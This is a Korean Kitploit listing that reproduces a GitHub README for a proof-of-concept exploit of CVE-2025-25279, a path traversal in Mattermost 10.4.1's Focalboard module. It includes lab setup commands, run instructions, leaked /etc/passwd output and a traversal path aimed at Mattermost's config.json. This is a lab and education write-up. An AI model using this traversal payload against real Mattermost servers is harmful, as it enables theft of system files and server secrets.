Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-25279-Mattermost-Path-Traversal — CVE-2025-25279에 대한 개념 증명 익스플로잇, Mattermost 10.4.1의 Focalboard 모듈에 있는 경로 탐색 취약점으로, 조작된 첨부 파일을 통해 인증된 임의 파일 유출이 가능합니다. | Kitploit
도구/GitHubGitHub/abokormahammadmousse/cve-2025-25279-mattermost-path-traversal
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubabokormahammadmousse/cve-2025-25279-mattermost-path-traversal

CVE-2025-25279-Mattermost-Path-Traversal

CVE-2025-25279에 대한 개념 증명 익스플로잇, Mattermost 10.4.1의 Focalboard 모듈에 있는 경로 탐색 취약점으로, 조작된 첨부 파일을 통해 인증된 임의 파일 유출이 가능합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
3개월 전아직 검토되지 않음

🔥 CVE-2025-25279 — Mattermost 10.4.1

📤 Focalboard의 경로 탐색을 통한 파일 유출

🌟 소개

이 개념 증명은 Mattermost 10.4.1에 영향을 미치는 CVE-2025-25279 취약점의 악용을 보여줍니다.
Focalboard(보드 관리 모듈)의 결함으로 인해 첨부 파일의 경로 탐색을 통한 임의 파일 읽기가 가능합니다.

익스플로잇은 다음을 유출할 수 있습니다:

  • /etc/passwd
  • /etc/group
  • 또는 Mattermost의 민감한 파일(예:
    opt/mattermost/config/config.json)

공격은 취약한 시나리오에서 인증된 사용자 계정이 있을 때만 작동합니다.


🗂️ 디렉토리 구조

  • 📁 target : 대상 박스 생성 디렉토리
  • 📁 live : 대상 VM 생성 및 익스플로잇 데모 디렉토리
  • 📁 src : 보조 소스 코드 (있는 경우)
  • 📁 refs : 문서 및 참고 자료 디렉토리
  • 📁 docs : 프로젝트 중 생성된 관련 문서 (동영상 포함)

🔧 사전 요구 사항

  • Vagrant
  • VirtualBox
  • 프로젝트 파일 세트 (target + live)
  • Mattermost 계정 (PAT = Personal Access Token)
  • Bash가 있는 Linux/Mac/Windows

📦 Mattermost 다운로드

target/ 폴더는 포함되어 있지 않습니다 (GitHub에 비해 너무 큼).

수동으로 다운로드: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz

그런 다음 파일을 target 폴더에 넣습니다.

VM 배포 전

먼저 target 디렉토리로 이동하여 다음을 실행하세요:

root@kitploit:~
cd target
make mattermost.box

mattermost-poc 박스가 없으면 VM이 작동하지 않으므로 확인하세요:

root@kitploit:~
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box

1. 취약한 머신 배포

VM 실행

root@kitploit:~
cd live/vm1
vagrant up

VM에 접속

root@kitploit:~
 vagrant ssh

웹 인터페이스에서 사용자 생성:

열기: http://localhost:8065

UI(사용자 인터페이스)에서 토큰 생성:

프로필 --> 보안 --> Personal Access Tokens

2. 익스플로잇 설치

호스트 머신에서:

root@kitploit:~
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip

chmod +x exploit.sh

3. 익스플로잇 실행

root@kitploit:~
./exploit.sh

다음이 요청됩니다:

root@kitploit:~
PAT (Personal Access Token) :

👉 유효한 Mattermost 사용자의 PAT를 입력하세요.

📸 출력 예시 (/etc/passwd 유출)

root@kitploit:~
===== 내용 (시작) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh

대상 파일: config.json

Mattermost의 민감한 파일을 대상으로 하려면:

exploit.sh 스크립트 상단에서 수정:

root@kitploit:~
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
그러면 익스플로잇이 config.json 파일의 내용을 표시합니다.

✒️ 저자

🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril

🎬 동영상 데모

👉 전체 데모 동영상은 다음 위치에 있습니다: live/Démonstration/video-poc-cve-2025-25279.mp4

🧩 참고 사항

이 PoC는 학습 환경 전용입니다. 교육 용도 외 또는 승인 없이 사용하지 마십시오.

도구 다운로드